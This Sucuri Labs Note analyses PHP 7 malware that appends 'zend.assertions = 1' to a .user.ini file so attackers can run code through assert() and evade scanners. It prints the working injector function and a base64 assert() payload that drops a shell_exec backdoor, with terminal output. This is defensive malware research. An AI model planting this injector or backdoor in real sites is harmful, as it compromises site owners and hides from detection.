• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Using assert() to Execute Malware in PHP 7 Environments

September 1, 2020Krasimir Konov

FacebookTwitterSubscribe

Initially released December 2015, PHP 7 introduced a multitude of performance and security improvements. Approximately 43.7% of websites across the web currently use PHP 7.x, making it an incredibly popular scripting language — which is likely why attackers are creating malware to target environments which leverage it.

During a recent investigation, our team stumbled across some malicious code which is used to inject a .user.ini file into a PHP 7 environment and add zend.assertions = 1. Once this injection is accomplished, bad actors can leverage PHP’s assert() function to execute any malicious code they like.

<?php
function __lambda_func()
{
    if (defined('PHP_MAJOR_VERSION') && PHP_MAJOR_VERSION == '7') {
        if (!file_exists('.user.ini') || strpos(file_get_contents('.user.ini'), 'zend.assertions = 1') === false) {
            $mtime = @filemtime('./');
            @file_put_contents(".user.ini", "zend.assertions = 1;\n", FILE_APPEND);
            @touch('./', $mtime, $mtime);
            @touch(".user.ini", $mtime, $mtime);
        }
    }
    assert_options(ASSERT_ACTIVE, true);
    assert_options(ASSERT_BAIL, true);
    assert_options(ASSERT_WARNING, false);
}

This code sample is specifically designed to deploy malicious code while concealing it from detection, and can be used to bypass security restrictions in the php.ini file. By creating a .user.ini file and setting the zend.assertions variable to 1, attackers can override the default php.ini file and leverage the assert() function to execute malware.

In a development environment where zend.assertions=1, an attacker’s malicious code will execute. If set to 0, the code will be generated but skipped at runtime, and in production environments where zend.assertions=-1, the code won’t even compile — essentially helping an attacker avoid detection by not burdening performance.

Here is one example of assert() being used to execute code to create a malicious backdoor. Note that zend.assertions has been set to 1:

$ grep "^zend.assertions" /etc/php/7.4/cli/php.ini
zend.assertions = 1

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:08 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$ php -r 'assert(base64_decode("ZmlsZV9wdXRfY29udGVudHMoJ2luamVjdGVkLnBocCcsICc8P3BocCBlY2hvICJhbm90aGVyIGJhY2tkb29yXG4iOyBlY2hvIHNoZWxsX2V4ZWMoInVuYW1lIC1hIik7IGVjaG8gIlxuIjsnKTs="));'

$ ls -la
total 12
drwxrwxr-x  2 core core 4096 May 01 10:09 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..
-rw-rw-r--  1 core core   72 May 01 10:09 injected.php

$ cat injected.php
<?php echo "another backdoor\n"; echo shell_exec("uname -a"); echo "\n";

$ php injected.php
another backdoor
Linux core 4.4.0-150-generic #176-Ubuntu SMP Wed May 29 18:56:26 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

 

  assert(print("Some debug message\n"));
  assert(($val = "dev") || true);

On the other hand, here is what happens when the value is set to its default directive -1:

$ grep "^zend.assertions" /etc/php/7.4/cli/php.ini
zend.assertions = -1

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:11 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$ php -r 'assert(base64_decode("ZmlsZV9wdXRfY29udGVudHMoJ2luamVjdGVkLnBocCcsICc8P3BocCBlY2hvICJhbm90aGVyIGJhY2tkb29yXG4iOyBlY2hvIHNoZWxsX2V4ZWMoInVuYW1lIC1hIik7IGVjaG8gIlxuIjsnKTs="));'

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:11 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$

When finding this type of malware within a compromised environment, it’s very likely that other malicious code will have also been added to different files around the website.

Attackers use the assert() function to avoid detection from modern web scanners who typically look for more common PHP functions like eval. In some cases, the eval function could even be disabled on the hosting environment (Suhosin module) to prevent code from being executed and using assert() can bypass this type of restriction.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Labs Note, Obfuscation, Website Backdoor

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.